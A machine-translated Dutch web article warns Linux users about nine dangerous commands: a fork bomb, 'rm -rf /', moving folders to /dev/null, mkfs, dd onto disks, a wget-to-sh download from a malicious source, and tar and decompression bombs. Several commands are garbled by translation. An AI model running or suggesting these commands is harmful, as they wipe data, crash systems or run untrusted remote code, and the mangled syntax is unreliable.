Startpagina » Desktop » 9 Linux-commando's en codes om op te letten

    9 Linux-commando's en codes om op te letten

    Linux shell / terminal-opdrachten zijn erg krachtig en alleen een eenvoudige opdracht zou kunnen leiden tot het verwijderen van een map, bestanden of hoofdmap, enz.

    In sommige gevallen vraagt ​​Linux je niet eens om bevestiging, maar voert het commando je meteen uit waardevolle gegevens en informatie verliezen opgeslagen in deze bestanden en mappen.

    Het is gebruikelijk dat mensen inhoud plaatsen op internet het aanbevelen van nieuwe Linux-gebruikers om deze opdrachten uit te voeren. Dit lijkt misschien een grap voor iemand die de inhoud heeft gepost maar het is geen lachertje voor de persoon aan de andere kant.

    We hebben enkele Linux-opdrachten verzameld die behoorlijk schadelijk zijn voor je systeem om je te helpen ze te vermijden. Houd er rekening mee dat ze inderdaad gevaarlijk zijn en kan zelfs op verschillende manieren worden gewijzigd om nieuwe opdrachten te produceren om meer schade toe te brengen.

    Een belangrijk ding om op te merken is dat sommige van deze commando's zijn alleen gevaarlijk als ze worden voorafgegaan door sudo op Ubuntu. Op andere distributies van Linux zijn de meeste van deze gegeven opdrachten gevaarlijk om als root uit te voeren.

    Kijk eens naar de 9 commando's en codes die u moet vermijden om uit te voeren.

    1. Linux Fork Bomb Command

    : () : |: & ;: ook gekend als Fork Bomb is een denial-of-service-aanval op een Linux-systeem. : () : |: & ;: is een bash-functie. Eenmaal uitgevoerd, het herhaalt zich meerdere keren totdat het systeem vastloopt.

    Je kunt er alleen vanaf komen door je systeem opnieuw op te starten. Dus wees voorzichtig bij het uitvoeren van deze opdracht op je Linux-shell.

    2. mv map / dev / null Opdracht

    mv map / dev / null is een ander riskant commando. Dev / null of nul apparaat is een apparaatbestand dat alle erop geschreven gegevens verwijdert, maar het meldt dat de schrijfbewerking met succes is uitgevoerd. Het is ook bekend als beetje bucked of zwart gat.

    3. rm-rf commando

    rm -rf opdracht is een snelle manier om verwijder een map en de inhoud ervan in het Linux-besturingssysteem. Als u niet weet hoe u het op de juiste manier moet gebruiken, kan het erg gevaarlijk worden voor het systeem. De meest voorkomende combinaties en opties die worden gebruikt met de opdracht rm-rf worden hieronder vermeld:

    • rm commando wordt gebruikt om de bestanden in het Linux-systeem te verwijderen.
    • rm -f commando verwijdert alleen-lezen bestanden in de map zonder vragen.
    • rm -r commando verwijdert de inhoud van een map recursief.
    • rm -d commando wordt gebruikt om een ​​lege map te verwijderen maar het zal weigeren de map te verwijderen als deze niet leeg is.
    • rm -rf / commando wordt gebruikt voor geforceerd verwijderen (het verwijdert het zelfs als het is beveiligd tegen schrijven) van alle inhoud in de hoofdmap en submappen.
    • rm -rf * commando wordt gebruikt voor geforceerde verwijdering van alle inhoud in de huidige map (directory waarin u momenteel werkt) en submappen.
    • rm -rf. commando wordt gebruikt voor geforceerde verwijdering van alle inhoud in de huidige map en submappen. De rm -r. [^.] * commando kan ook worden gebruikt.
    • rm -i commando wordt gebruikt voor het verwijderen van bestanden en mappen, maar er verschijnt een prompt voor verwijdering.

    4. opdracht mkfs

    mkfs kan een gevaarlijk commando zijn voor je op Linux gebaseerde systeem als je het doel ervan niet weet. Alles dat na de mkfs is geschreven, wordt geformatteerd en vervangen door een leeg Linux-bestandssysteem.

    Alle onderstaande commando's zullen de harde schijf formatteren en het vereist beheerdersrechten:

    • mkfs
    • mkfs.ext3
    • mkfs.bfs
    • mkfs.ext2
    • mkfs.minix
    • mkfs.msdos
    • mkfs.reiserfs
    • mkfs.vfat

    Het bevel mkfs.cramfs zal hetzelfde doen als het bovenstaande, maar het vereist geen beheerdersrechten om uit te voeren.

    5. Tar Bomb

    De teer commando wordt gebruikt voor het combineren van meerdere bestanden in een enkel bestand (gearchiveerd bestand) in .teer formaat. Met deze opdracht kan een Tape Archive (Tar) bom worden gemaakt.

    Het is een archiefbestand dat ontploft in duizenden of miljoenen bestanden met namen die vergelijkbaar zijn met de bestaande bestanden in de huidige map in plaats van in een nieuwe map als deze niet is opgeheven.

    Je kunt voorkomen dat je slachtoffer wordt van een teerbom regelmatig een nieuwe beschermende map maken wanneer u een tar-bestand ontvangt en verplaats vervolgens het ontvangen tar-bestand naar deze map voordat u untarring.

    Als het tar-bestand inderdaad een teerbom is, kun je eenvoudigweg de zojuist gemaakte directory verwijderen om ervan af te komen. Een andere manier om de explosie van een teerbom te voorkomen is via de -t optie om alle inhoud van een tar-bestand te tonen om u een idee te geven van het type inhoud in het tar-bestand.

    6. Opdracht dd

    De dd commando wordt gebruikt om kopieer en converteer harde schijf partities. Het kan echter schadelijk zijn als u de verkeerde bestemming opgeeft.

    Het commando kan een van deze zijn:

    • dd if = / dev / hda van = / dev / hdb
    • dd if = / dev / hda van = / dev / sdb
    • dd if = iets van = / dev / hda
    • dd if = iets van = / dev / sda

    Met de volgende opdracht wordt de hele primaire harde schijf leeggemaakt: dd if = / dev / zero of = / dev / had

    7. Shell Script-code

    Iemand kan je een slachtoffer maken geeft je de link naar een shellscript en keurt je goed om het te downloaden en uit te voeren. Het script bevat mogelijk kwaadaardige of gevaarlijke code. De indeling van het commando kan er zo uitzien: wget http: // some_malicious_source -O- | sh. De wget zal het script downloaden terwijl de sh de uitvoering van het script downloadt.

    8. Kwaadaardige broncode

    Iemand geeft je de broncode en vraagt ​​je om het te compileren. De code lijkt misschien een normale code, maar in feite is sommige kwaadaardige code verborgen in de grote broncode en het kan schade toebrengen aan uw systeem. Om te voorkomen dat je slachtoffer wordt van dit soort aanvallen, accepteer en compileer uw broncode alleen van betrouwbare bronnen.

    9. Decompressiebom

    U hebt een gecomprimeerd bestand ontvangen en u wordt gevraagd om dit bestand uit te pakken, dat erg klein lijkt te zijn, maar mogelijk enkele KB bevat. Eigenlijk, dit gecomprimeerde bestand van kleine omvang bevat zeer sterk gecomprimeerde gegevens.

    Zodra het bestand is gedecomprimeerd, wordt honderden GB aan gegevens geëxtraheerd die kan je harde schijf vullen om de prestaties van uw systeem te verminderen. Om dit te voorkomen, moet u altijd onthouden dat u gegevens uit betrouwbare bronnen accepteert.